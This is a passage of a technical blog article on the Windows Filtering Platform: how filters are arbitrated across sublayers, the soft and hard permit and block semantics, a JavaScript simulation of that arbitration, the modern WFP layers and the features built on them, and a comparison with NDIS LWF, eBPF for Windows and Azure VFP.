&lt;p&gt;Filter arbitration is actually two passes, not one. Within a single sublayer, the engine evaluates the filters that match in weight order from highest to lowest, and stops at the first filter that returns Permit or Block. That first matching filter wins; lower-weight filters in the same sublayer never run. The engine then performs the same pass on the next sublayer down. Once every sublayer has produced a verdict, the BFE composes those per-sublayer verdicts into one per-layer decision -- and that is where Block-over-Permit and the soft/hard override flag come in. Filter Arbitration states the second pass:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&quot;&apos;Block&apos; overrides &apos;Permit&apos;. &apos;Block&apos; is final (cannot be overridden) and stops the evaluation. The packet is discarded.&quot; [@wfp-arbitration]&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&quot;Block&quot; and &quot;Permit&quot; each come in two variants. The variant is set by a per-action flag, &lt;code&gt;FWPS_RIGHT_ACTION_WRITE&lt;/code&gt;, in the callout&apos;s classify-output structure: &quot;If the flag is set, it indicates that the action can be overridden. If the flag is absent, the action cannot be overridden&quot; [@wfp-arbitration]. The four-cell table below is the override-policy table the BFE uses to compose per-sublayer verdicts into one layer-level action.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Action&lt;/th&gt;
&lt;th&gt;Override allowed?&lt;/th&gt;
&lt;th&gt;Common name&lt;/th&gt;
&lt;th&gt;What it means&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Permit + &lt;code&gt;FWPS_RIGHT_ACTION_WRITE&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Soft permit&lt;/td&gt;
&lt;td&gt;A lower-priority sublayer&apos;s verdict (composed later by the BFE) may overturn it [@wfp-arbitration]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Permit, flag absent&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Hard permit&lt;/td&gt;
&lt;td&gt;Final permit; only a callout Veto in another sublayer can block. [@wfp-arbitration]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Block + &lt;code&gt;FWPS_RIGHT_ACTION_WRITE&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Soft block&lt;/td&gt;
&lt;td&gt;A lower-priority sublayer may overturn it, but Block-over-Permit still applies if no override fires [@wfp-arbitration]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Block, flag absent&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Hard block&lt;/td&gt;
&lt;td&gt;Final block. Evaluation stops. Packet discarded. [@wfp-arbitration]&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The soft/hard distinction is therefore a cross-sublayer property, not a within-sublayer one. Within a sublayer the rule is &quot;first match wins&quot;; only the composition step between sublayers consults the override flag.&lt;/p&gt;
&lt;p&gt;There is a fifth case. A callout that returns &lt;code&gt;FWP_ACTION_BLOCK&lt;/code&gt; while it could have returned &lt;code&gt;FWP_ACTION_PERMIT&lt;/code&gt; is exercising what the documentation calls a &lt;em&gt;Veto&lt;/em&gt;. The callout has been given the opportunity to authorize a packet and has refused. That is how a third-party EDR&apos;s deep-inspection callout can refuse a flow that an in-box filter has already soft-permitted, without ever knowing the soft-permit happened: the engine offers the packet, the callout says no, and the no is final.&lt;/p&gt;

sequenceDiagram
    participant E as Filter engine
    participant S1 as Sublayer @ priority 100 (no matching filter)
    participant S2 as Sublayer @ priority 50 (winner: soft permit)
    participant S3 as Sublayer @ priority 10 (winner: hard permit)
    participant C as Deep-inspection callout (registered in default sublayer)
    E-&amp;gt;&amp;gt;S1: evaluate highest-priority sublayer
    S1--&amp;gt;&amp;gt;E: no matching filter (Continue)
    E-&amp;gt;&amp;gt;S2: evaluate next sublayer
    S2--&amp;gt;&amp;gt;E: Soft Permit (FWPS_RIGHT_ACTION_WRITE)
    Note over E: tentative layer action = Permit (overridable)
    E-&amp;gt;&amp;gt;S3: evaluate next sublayer
    S3--&amp;gt;&amp;gt;E: Hard Permit (no override flag)
    Note over E: layer action = Permit (final unless a callout vetoes)
    E-&amp;gt;&amp;gt;C: invoke callout for the permitted flow
    C--&amp;gt;&amp;gt;E: Veto -&amp;gt; Block (terminal)
    Note over E: final layer-level action = Block
&lt;p&gt;Walk a worked example. An &lt;a href=&quot;https://paragmali.com/blog/appcontainer-and-lowbox-tokens-windowss-capability-sandbox/&quot; rel=&quot;noopener&quot;&gt;AppContainer&lt;/a&gt; process (an Edge tab, say, or any process launched with &lt;code&gt;CreateProcess&lt;/code&gt; and an AppContainer SID token) tries to open an outbound TCP connection to &lt;code&gt;203.0.113.5:443&lt;/code&gt;. The Windows TCP/IP stack invokes the ALE shim, which classifies the connection request at &lt;code&gt;FWPM_LAYER_ALE_AUTH_CONNECT_V4&lt;/code&gt;. The filter engine walks the sublayers at that layer from highest priority to lowest. Within each sublayer, filters fire highest-weight-first, and the first matching Permit or Block ends evaluation in that sublayer. If a vendor EDR has placed a Veto-style deep-inspection callout in its own sublayer, the callout runs and can deny the connection regardless of what any other sublayer would have done. If no filter explicitly permits the AppContainer with the matching capability SID (&lt;code&gt;internetClient&lt;/code&gt;, &lt;code&gt;internetClientServer&lt;/code&gt;, or &lt;code&gt;privateNetworkClientServer&lt;/code&gt;), the &quot;Block Outbound Default Rule&quot; filter in the firewall&apos;s default sublayer fires last and the connection is denied [@forshaw-2021].&lt;/p&gt;
&lt;p&gt;{`
// Faithful translation of the Microsoft Learn &quot;Filter Arbitration&quot; algorithm
// for the cross-sublayer composition pass. The within-sublayer pass (not
// shown) returns one verdict per sublayer using a first-match-wins rule on
// weight-ordered filters. This function composes those per-sublayer verdicts
// into the layer-level action using FWPS_RIGHT_ACTION_WRITE semantics.
// Source: &lt;a href=&quot;https://learn.microsoft.com/en-us/windows/win32/fwp/filter-arbitration&quot; rel=&quot;noopener&quot;&gt;https://learn.microsoft.com/en-us/windows/win32/fwp/filter-arbitration&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;const SOFT_PERMIT = { action: &apos;Permit&apos;, override: true  };
const HARD_PERMIT = { action: &apos;Permit&apos;, override: false };
const SOFT_BLOCK  = { action: &apos;Block&apos;,  override: true  };
const HARD_BLOCK  = { action: &apos;Block&apos;,  override: false };&lt;/p&gt;
&lt;p&gt;// Each element is the winning verdict from one sublayer, ordered by sublayer
// priority from highest to lowest.
const sublayerVerdicts = [
  // Vendor EDR deep-inspection callout, hard block on a known-bad destination
  { sublayer: &apos;EDR-veto&apos;,     priority: 100n, match: (pkt) =&amp;gt; pkt.dst === &apos;203.0.113.5&apos;,
                              verdict: () =&amp;gt; HARD_BLOCK },
  // Windows Defender Firewall app rule, allow-with-override
  { sublayer: &apos;WDF-allow&apos;,    priority:  50n, match: () =&amp;gt; true,
                              verdict: () =&amp;gt; SOFT_PERMIT },
  // Block Outbound Default Rule (BFE default sublayer)
  { sublayer: &apos;block-default&apos;,priority:  10n, match: () =&amp;gt; true,
                              verdict: () =&amp;gt; HARD_BLOCK },
];&lt;/p&gt;
&lt;p&gt;function composeAcrossSublayers(packet, sublayers) {
  // Higher priority composes first
  const ordered = [...sublayers].sort((a, b) =&amp;gt; Number(b.priority - a.priority));
  let tentative = null;
  for (const s of ordered) {
    if (!s.match(packet)) continue;
    const v = s.verdict();
    if (!v.override) {
      // Hard action: final, composition stops
      return { decision: v.action, by: s.sublayer };
    }
    // Soft action: remember, but keep composing in case a lower-priority
    // sublayer issues a hard verdict or a Block (Block overrides Permit).
    if (tentative === null || v.action === &apos;Block&apos;) {
      tentative = { decision: v.action, by: s.sublayer };
    }
  }
  return tentative ?? { decision: &apos;Permit&apos;, by: &apos;no-match-default&apos; };
}&lt;/p&gt;
&lt;p&gt;console.log(composeAcrossSublayers({ dst: &apos;203.0.113.5&apos; }, sublayerVerdicts));
// -&amp;gt; { decision: &apos;Block&apos;, by: &apos;EDR-veto&apos; }  (hard block at priority 100)&lt;/p&gt;
&lt;p&gt;console.log(composeAcrossSublayers({ dst: &apos;198.51.100.7&apos; }, sublayerVerdicts));
// -&amp;gt; { decision: &apos;Block&apos;, by: &apos;block-default&apos; } (soft permit overridden by hard block)
`}&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Two competing Windows security products coexist on the same host because each one owns its own sublayer, with its own weight neighbourhood. Within a sublayer the BFE picks one winner using &quot;first matching Permit or Block stops evaluation.&quot; Across sublayers the BFE composes those winners using &quot;Block overrides Permit, hard actions are final, soft actions can be overridden.&quot; Pre-Vista, Windows had filters. Post-Vista, Windows has arbitration.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The engine arbitrates filters deterministically and separates condition-match (the filter) from action (the callout). What does the modern surface look like, in 2026, with two decades of features bolted on top?&lt;/p&gt;
&lt;h2&gt;6. The Modern WFP Surface&lt;/h2&gt;
&lt;p&gt;It is 2026. WFP is twenty years old, has never been replaced, and ships under more components than any other Windows networking primitive. Here is what it looks like today.&lt;/p&gt;
&lt;h3&gt;The filter engine and its kernel client&lt;/h3&gt;
&lt;p&gt;The filter engine is the same architectural piece WFP v1 shipped with: a cross-mode classifier whose kernel-mode classification path runs primarily inside &lt;code&gt;NETIO.SYS&lt;/code&gt; and whose user-mode side runs inside the Base Filtering Engine service host process [@wfp-arch][@forshaw-2021]. Callouts and filter consumers do not link against &lt;code&gt;NETIO.SYS&lt;/code&gt;. They link against a different binary.&lt;/p&gt;

The kernel-mode WFP client and export driver. Callout drivers and other kernel components link against `fwpkclnt.lib`, whose in-memory module is `fwpkclnt.sys` [@wfp-arch]. The driver is the API surface that callouts use to register, classify, and call back into the engine. The classification path itself, where filters are matched and actions chosen, runs primarily in `NETIO.SYS`. The shorthand &quot;fwpkclnt.sys *is* the filter engine&quot; is common in blog posts and incorrect; the two binaries do different jobs.
&lt;p&gt;The BFE-vs-MpsSvc split is the second confusion to clear. &lt;code&gt;bfe&lt;/code&gt; is the Base Filtering Engine, the platform service [@wfp-about]. &lt;code&gt;MpsSvc&lt;/code&gt; is the Windows Defender Firewall service, one consumer of the platform. The dependency goes one way: &lt;code&gt;MpsSvc&lt;/code&gt; depends on &lt;code&gt;bfe&lt;/code&gt;; &lt;code&gt;bfe&lt;/code&gt; does not depend on &lt;code&gt;MpsSvc&lt;/code&gt;.You can verify the dependency direction on any running Windows box. &lt;code&gt;Get-Service bfe&lt;/code&gt;, &lt;code&gt;Get-Service mpssvc&lt;/code&gt;, then &lt;code&gt;Get-Service mpssvc | Select-Object -ExpandProperty ServicesDependedOn&lt;/code&gt; will list &lt;code&gt;BFE&lt;/code&gt; (among others); the reverse query on &lt;code&gt;bfe&lt;/code&gt; lists no dependency on &lt;code&gt;mpssvc&lt;/code&gt;. Forshaw&apos;s 2021 post documents the same arrow from the policy side: &quot;MPSSVC converts its ruleset to the lower-level WFP firewall filters and sends them over RPC to the Base Filtering Engine (BFE) service&quot; [@forshaw-2021].&lt;/p&gt;
&lt;h3&gt;Roughly sixty filtering layers&lt;/h3&gt;
&lt;p&gt;Microsoft&apos;s &quot;Management Filtering Layer Identifiers&quot; reference enumerates about sixty &lt;code&gt;FWPM_LAYER_*&lt;/code&gt; GUIDs, organised by shim, direction (inbound, outbound, forward), stage (pre-IPsec, post-IPsec, discard), and IP version (v4 / v6) [@wfp-layers]. The reference page is dense, but reading it once teaches the structure. A small sample of representative layers:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;FWPM_LAYER_INBOUND_IPPACKET_V4&lt;/code&gt; and &lt;code&gt;_V6&lt;/code&gt;. &quot;Located in the receive path just after the IP header of a received packet has been parsed but before any IP header processing takes place. No IPsec decryption or reassembly has occurred&quot; [@wfp-layers]. The earliest visibility a callout has into a received packet.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;FWPM_LAYER_OUTBOUND_IPPACKET_V4&lt;/code&gt; and &lt;code&gt;_V6&lt;/code&gt;. The send-path twin.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;FWPM_LAYER_IPFORWARD_V4&lt;/code&gt; and &lt;code&gt;_V6&lt;/code&gt;. The routing-decision point on a forwarding host [@wfp-layers].&lt;/li&gt;
&lt;li&gt;&lt;code&gt;FWPM_LAYER_INBOUND_TRANSPORT_V4&lt;/code&gt; and &lt;code&gt;_V6&lt;/code&gt;. After the TCP/UDP/ICMP header has been parsed but before payload delivery [@wfp-layers].&lt;/li&gt;
&lt;li&gt;&lt;code&gt;FWPM_LAYER_STREAM_V4&lt;/code&gt; and &lt;code&gt;_V6&lt;/code&gt;. The TCP stream layer where reassembled byte streams are visible [@wfp-layers].&lt;/li&gt;
&lt;li&gt;&lt;code&gt;FWPM_LAYER_DATAGRAM_DATA_V4&lt;/code&gt; and &lt;code&gt;_V6&lt;/code&gt;. Connectionless data delivery (UDP / ICMP) [@wfp-layers].&lt;/li&gt;
&lt;li&gt;&lt;code&gt;FWPM_LAYER_INBOUND_MAC_FRAME_ETHERNET&lt;/code&gt;. Added in Windows 8; the L2 hook the &quot;What&apos;s New&quot; page introduced [@wfp-whatsnew].&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Each non-DISCARD layer has a DISCARD twin that fires when the engine has decided to drop a packet at that point. Callouts that need to log drops register at the DISCARD layer; callouts that need to inspect or modify register at the non-DISCARD twin [@wfp-layers].&lt;/p&gt;
&lt;h3&gt;ALE classification&lt;/h3&gt;
&lt;p&gt;The ALE shim sits across seven &lt;code&gt;FWPM_LAYER_ALE_*&lt;/code&gt; filtering layers plus the two redirection layers introduced in the Windows 10 era [@wfp-ale-layers]:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;RESOURCE_ASSIGNMENT&lt;/code&gt; -- local endpoint assignment (&lt;code&gt;bind&lt;/code&gt;).&lt;/li&gt;
&lt;li&gt;&lt;code&gt;AUTH_LISTEN&lt;/code&gt; -- TCP &lt;code&gt;listen&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;AUTH_RECV_ACCEPT&lt;/code&gt; -- inbound TCP accept; inbound UDP/ICMP first datagram.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;AUTH_CONNECT&lt;/code&gt; -- outbound TCP &lt;code&gt;connect&lt;/code&gt;; outbound UDP/ICMP first datagram.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;FLOW_ESTABLISHED&lt;/code&gt; -- the stateful &quot;connection now exists&quot; event.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;RESOURCE_RELEASE&lt;/code&gt;, &lt;code&gt;ENDPOINT_CLOSURE&lt;/code&gt; -- teardown.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;CONNECT_REDIRECT&lt;/code&gt;, &lt;code&gt;BIND_REDIRECT&lt;/code&gt; -- the Windows 10 redirection hooks.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Stateful per-flow context lives in the ALE shim. Application identity at each ALE layer is a normalized file name; user identity is a security descriptor [@wfp-ale]. That pair is what turns &quot;block port 443 outbound&quot; into &quot;block port 443 outbound from &lt;code&gt;chrome.exe&lt;/code&gt; running as user &lt;code&gt;S-1-5-21-...&lt;/code&gt;.&quot;&lt;/p&gt;
&lt;h3&gt;In-box callouts and downstream features&lt;/h3&gt;
&lt;p&gt;The &quot;Built-in Callout Identifiers&quot; reference page enumerates the GUIDs of every in-box callout: the &lt;code&gt;FWPM_CALLOUT_IPSEC_*&lt;/code&gt; family (transport, tunnel, forward-tunnel, inbound-initiate-secure, ALE-connect); &lt;code&gt;FWPM_CALLOUT_WFP_TRANSPORT_LAYER_V4_SILENT_DROP&lt;/code&gt; and &lt;code&gt;_V6_SILENT_DROP&lt;/code&gt;; the &lt;code&gt;FWPM_CALLOUT_TCP_CHIMNEY_*&lt;/code&gt; callouts [@wfp-builtin-callouts]. Microsoft describes the four canonical roles a callout plays: &quot;Deep Inspection... Packet Modification... Stream Modification... Data Logging&quot; [@wfp-callouts].&lt;/p&gt;

A kernel driver that registers one or more callout functions with the filter engine. The engine invokes a callout&apos;s `classifyFn` when a filter at a layer specifies the callout&apos;s GUID as its action [@wfp-filter-engine]. Callouts implement one of four roles: deep inspection (read-only payload examination), packet modification, stream modification, or data logging [@wfp-callouts]. Every third-party network-security product on Windows that runs in the kernel ships a callout driver.
&lt;p&gt;The downstream features are not peers of WFP. They are configurations of it.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Windows Defender Firewall with Advanced Security (WFAS).&lt;/strong&gt; Microsoft Learn names this relationship verbatim: &quot;The firewall application that is built into Windows Vista, Windows Server 2008, and later operating systems Windows Firewall with Advanced Security (WFAS) is implemented using WFP&quot; [@wfp-start]. The &lt;code&gt;MpsSvc&lt;/code&gt; service translates the WFAS rule database into WFP filters that live in the &lt;code&gt;MPSSVC_WSH&lt;/code&gt; provider&apos;s sublayer [@forshaw-2021].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Windows IPsec.&lt;/strong&gt; The Base Filtering Engine &quot;plumbs configuration settings to other modules in the system. For example, IPsec negotiation polices go to IKE/AuthIP keying modules, filters go to the filter engine&quot; [@wfp-about]. IPsec is not a separate stack; it is a configuration of WFP plus the IKE/AuthIP keying modules.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;WinNAT and Windows container networking.&lt;/strong&gt; The PowerShell cmdlet &lt;code&gt;New-NetNat&lt;/code&gt; &quot;creates a Network Address Translation (NAT) object that translates an internal network address to an external network address&quot; [@netnat]; WinNAT, the implementation behind it, registers WFP filters to perform the translation. Windows containers use WinNAT for their default NAT switch.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Hyper-V Extensible Switch.&lt;/strong&gt; Since Windows 8 / Server 2012, &quot;the Hyper-V extensible switch is supported starting with NDIS 6.30 in Windows Server 2012,&quot; and the switch supports extensible-switch extensions that &quot;bind within the extensible switch driver stack&quot; [@hyperv-extswitch]. WFP filters and callouts can be placed at vSwitch ingress and egress [@wfp-whatsnew].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Microsoft Defender for Endpoint Network Protection.&lt;/strong&gt; The Microsoft Learn page documents the capability: &quot;Network Protection will block connections on all ports (not just 80 and 443)&quot; [@mde-netprot]. The product enforces SmartScreen domain reputation across the entire process tree, not just the browser. The exact WFP-layer registration map is not publicly documented; Section 9 returns to it.&quot;The exact WFP-layer registration map for Microsoft Defender for Endpoint Network Protection is not publicly documented.&quot; This is one of the rare honest-disclosure moments in the WFP story. Microsoft has published the capability [@mde-netprot] but has not published the exact set of &lt;code&gt;FWPM_LAYER_*&lt;/code&gt; identifiers Network Protection registers callouts at. Community reverse engineering knows fragments of the map. Section 9 treats this as an open engineering problem.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Third-party EDR network filters.&lt;/strong&gt; CrowdStrike Falcon, SentinelOne, Cisco Secure Endpoint, ESET, Sophos, and the rest of the EDR vendor list ship WFP callout drivers as the standard kernel-side primitive for network telemetry and policy enforcement. There is no single Microsoft document that lists them. Forshaw&apos;s 2021 Project Zero post is the closest a primary source comes to acknowledging that this is how the industry has settled [@forshaw-2021].&lt;/li&gt;
&lt;/ul&gt;

The textbook reference for WFP architecture is *Windows Internals, Part 2*, 7th edition, by Russinovich, Solomon, Ionescu, Yosifovich, and Allievi (Microsoft Press, 2021) [@windows-internals-7th]. The book&apos;s Networking chapter walks through TCP/IP driver internals and WFP architecture together, including the filter-engine / BFE / shim taxonomy this article has used. Treat the book as the slow-read complement to the Microsoft Learn references; the chapter does not duplicate the Learn pages, it explains why the architecture chose the shape it did. Page numbers vary by printing; cite by chapter heading.
&lt;p&gt;Five downstream features on one engine. So what are the alternatives, if you want to ship a kernel-mode network filter on Windows today and do not want to use WFP?&lt;/p&gt;
&lt;h2&gt;7. Competing Approaches -- LWF, eBPF, Extensible Switch, and the Azure VFP&lt;/h2&gt;
&lt;p&gt;WFP is the L3+ answer. What else is there to attach to?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;NDIS Lightweight Filter (LWF).&lt;/strong&gt; The L2 sibling. NDIS 6.0, shipped with Vista, introduced &quot;NDIS filter drivers. Filter drivers can monitor and modify the interaction between protocol drivers and miniport drivers. Filter drivers are easier to implement and have less processing overhead than NDIS intermediate drivers&quot; [@ndis-filter]. LWF is the modern replacement for NDIS 5.x intermediate drivers. It sits below the protocol stack, sees raw Ethernet frames, has no application identity, and is the right choice for raw L2 work: VLAN tagging, EAPoL, packet capture (Npcap, NMNT). Choose LWF over WFP when you need pre-IP visibility and no per-process identity.&lt;/p&gt;

A kernel filter driver registered with NDIS that monitors or modifies the path between a protocol driver and a miniport driver. LWF replaced NDIS 5.x intermediate drivers starting with NDIS 6.0 [@ndis-filter]. LWF drivers see Ethernet frames before any IP processing has happened. They cannot see application identity, since the OS does not yet know which process the frame belongs to.
&lt;p&gt;&lt;strong&gt;Hyper-V Extensible Switch extensions.&lt;/strong&gt; A specialised NDIS LWF profile. NDIS 6.30, Windows Server 2012. &quot;The Hyper-V extensible switch supports an interface that allows instances of NDIS filter drivers (known as extensible switch extensions) to bind within the extensible switch driver stack... The Hyper-V extensible switch is supported starting with NDIS 6.30 in Windows Server 2012&quot; [@hyperv-extswitch]. Extensions come in three roles -- capture, filter, and forwarding -- with one forwarding-extension slot per vSwitch. Choose extensible switch extensions for Hyper-V Network Virtualization, software-defined-networking overlays, or SR-IOV gating.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;eBPF for Windows.&lt;/strong&gt; A Microsoft-sponsored project to bring the Linux eBPF programming model to Windows. The GitHub README describes its scope as letting existing eBPF toolchains and APIs familiar from Linux be used on top of Windows, and frames the project as a work-in-progress [@ebpf-readme]. Three deployment modes: native (&quot;PREVAIL verifier... &lt;code&gt;bpf2c&lt;/code&gt; tool converts every instruction in the bytecode to equivalent C statements... built into a windows driver module (stored in a .sys file)... This is the preferred way of deploying eBPF programs&quot; [@ebpf-readme]); JIT (user-mode service, &quot;with HVCI enabled, eBPF programs cannot be JIT compiled, but can be run in the native mode&quot; [@ebpf-readme]); and interpreter (debug only). The hooks the project exposes (XDP, BIND, SOCK_ADDR, SOCK_OPS, CGROUP_SOCK_ADDR) are the Linux-flavoured analogues of the WFP shim points. The v1.1.0 release, published in March 2026 and labelled &quot;first stable&quot; while still tagged Pre-release, &quot;added hard/soft permit verdicts&quot; to its accept and bind hooks -- explicitly mirroring the WFP &lt;code&gt;FWPS_RIGHT_ACTION_WRITE&lt;/code&gt; model [@ebpf-releases]. The project&apos;s own pages page repeats the work-in-progress framing [@ebpf-pages]. Choose eBPF for Windows for pre-stack DDoS scrubbing or cross-platform observability prototypes; the production-readiness caveat applies.&lt;/p&gt;

A Microsoft-sponsored open-source project that ports the Linux eBPF execution and toolchain to Windows. The native deployment mode compiles eBPF bytecode through PREVAIL verification and the `bpf2c` translator into a signed `.sys` kernel driver, which preserves HVCI compatibility [@ebpf-readme]. As of the v1.1.0 release (March 2026), the project remains tagged Pre-release on GitHub [@ebpf-releases].
&lt;p&gt;&lt;strong&gt;Azure VFP -- a name collision that requires disambiguation.&lt;/strong&gt; The Azure host-SDN data plane, presented by Daniel Firestone at NSDI 2017 [@firestone-nsdi17], is called the Virtual Filtering Platform. Same initials shape as WFP. Different platform. VFP is the programmable virtual switch that runs on every Azure compute host; the NSDI 2017 abstract notes that &quot;VFP has been deployed on &amp;gt;1M hosts running IaaS and PaaS workloads for over 4 years&quot; [@firestone-nsdi17]. It uses match-action tables, layers (the word &quot;layer&quot; appears with a different semantic from WFP&apos;s), Unified Flow Tables, and AccelNet FPGA offload via the Generic Flow Table. VFP ships with Azure, on Azure hosts. It is not customer-buildable on a Windows desktop, and Windows desktop and Server SKUs do not run it. The platforms are unrelated despite the name overlap.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The Azure Virtual Filtering Platform (VFP), introduced in Firestone&apos;s NSDI 2017 paper, is the Azure host SDN data plane and shares only an acronym shape with the Windows Filtering Platform [@firestone-nsdi17]. VFP runs on Azure hosts under the Hyper-V Extensible Switch and is the layer that powers SLB, NSGs, AccelNet, and Azure Virtual Network. It is unrelated to the WFP filter engine, BFE, or &lt;code&gt;fwpkclnt.sys&lt;/code&gt;. If the title of your inquiry contains both names, you are almost certainly looking at one or the other; the focus-premise audit in this article&apos;s source notes flagged the original input&apos;s mention of &quot;SecureNAT&quot; as similar terminological drift that led to the wrong product.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Approach&lt;/th&gt;
&lt;th&gt;Layer / scope&lt;/th&gt;
&lt;th&gt;App identity&lt;/th&gt;
&lt;th&gt;Best for&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;WFP callout driver&lt;/td&gt;
&lt;td&gt;L3+ across approximately sixty &lt;code&gt;FWPM_LAYER_*&lt;/code&gt; IDs [@wfp-layers]&lt;/td&gt;
&lt;td&gt;Yes via ALE [@wfp-ale]&lt;/td&gt;
&lt;td&gt;App-aware on-host filtering and EDR telemetry&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;NDIS LWF&lt;/td&gt;
&lt;td&gt;L2, below the protocol stack [@ndis-filter]&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Raw L2: capture, VLAN, EAPoL&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Hyper-V Extensible Switch ext&lt;/td&gt;
&lt;td&gt;Inside the vSwitch, NDIS 6.30+ [@hyperv-extswitch]&lt;/td&gt;
&lt;td&gt;Per-VM, not per-process&lt;/td&gt;
&lt;td&gt;Hyper-V network virtualization, SDN overlays&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;eBPF for Windows&lt;/td&gt;
&lt;td&gt;XDP / BIND / SOCK_ADDR hooks [@ebpf-readme]&lt;/td&gt;
&lt;td&gt;Partial&lt;/td&gt;
&lt;td&gt;Pre-stack DDoS, cross-platform observability prototypes (Pre-release)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Azure VFP&lt;/td&gt;
&lt;td&gt;Azure host SDN; not customer-buildable [@firestone-nsdi17]&lt;/td&gt;
&lt;td&gt;N/A&lt;/td&gt;
&lt;td&gt;Azure-host SDN policy (Microsoft-internal)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;None of these displaces WFP for the dominant on-host case (application-identity-aware, IPsec-integrated, stateful, multi-vendor-arbitrated). And all of them share one limit -- a limit that is built into the laws of network physics, not into Microsoft&apos;s roadmap.&lt;/p&gt;
&lt;h2&gt;8. Three Ceilings -- Encryption, Offload, Kernel EoP&lt;/h2&gt;
&lt;p&gt;Three ceilings sit above WFP and every alternative listed above. None is a Microsoft bug. All are structural.&lt;/p&gt;
&lt;h3&gt;The encryption ceiling&lt;/h3&gt;
&lt;p&gt;A WFP callout at the stream layer sees plaintext only if the payload was never encrypted, or if it was encrypted by a key the kernel owns (IPsec).IPsec is the one case where the kernel does hold the keys, because the IKE/AuthIP keying modules that BFE plumbs to are themselves Windows components [@wfp-about]. Every other in-process TLS or QUIC stack keeps its keys away from the kernel. TLS 1.3 and QUIC are end-to-end encrypted from the callout&apos;s point of view; the keys are inside the application&apos;s user-mode TLS library. A callout that registers at &lt;code&gt;FWPM_LAYER_STREAM_V4&lt;/code&gt; and reads bytes off a Chrome HTTPS connection sees ciphertext.&lt;/p&gt;
&lt;p&gt;The case is even sharper for QUIC. QUIC runs over UDP. From the first packet, almost all of the QUIC control plane is encrypted with a key derived from the connection&apos;s initial secret. A datagram-layer callout that wants to inspect the QUIC handshake -- not the payload, just the handshake -- cannot. Microsoft&apos;s own product team has acknowledged the limit in plain English on the Defender for Endpoint Network Protection page:&lt;/p&gt;

Blocking FQDNs in non-Microsoft browsers requires that QUIC and Encrypted Client Hello be disabled in those browsers. -- Microsoft Defender for Endpoint, *Network Protection* [@mde-netprot]
&lt;p&gt;That sentence is the encryption ceiling in Microsoft&apos;s own words. The product can block by 5-tuple (IP, port, protocol). It cannot block by hostname inside an Edge tab over QUIC unless QUIC is disabled in that browser. The limit is information-theoretic: a kernel filter without the session keys cannot read the encrypted payload. No engineering changes in WFP can lift it. The fix lives in the browser or in a user-mode TLS-inspecting proxy.&lt;/p&gt;
&lt;h3&gt;The offload ceiling&lt;/h3&gt;
&lt;p&gt;The second ceiling came from hardware. Modern NICs do work that the kernel used to do, because doing it in hardware is faster. UDP Receive Segment Coalescing Offload, the marquee feature of NDIS 6.89 in Windows 11 24H2, is the cleanest example: &quot;URO enables network interface cards (NICs) to coalesce UDP receive segments. NICs can combine UDP datagrams from the same flow that match a set of rules into a logically contiguous buffer. These combined datagrams are then indicated to the Windows networking stack as a single large packet&quot; [@uro].&lt;/p&gt;
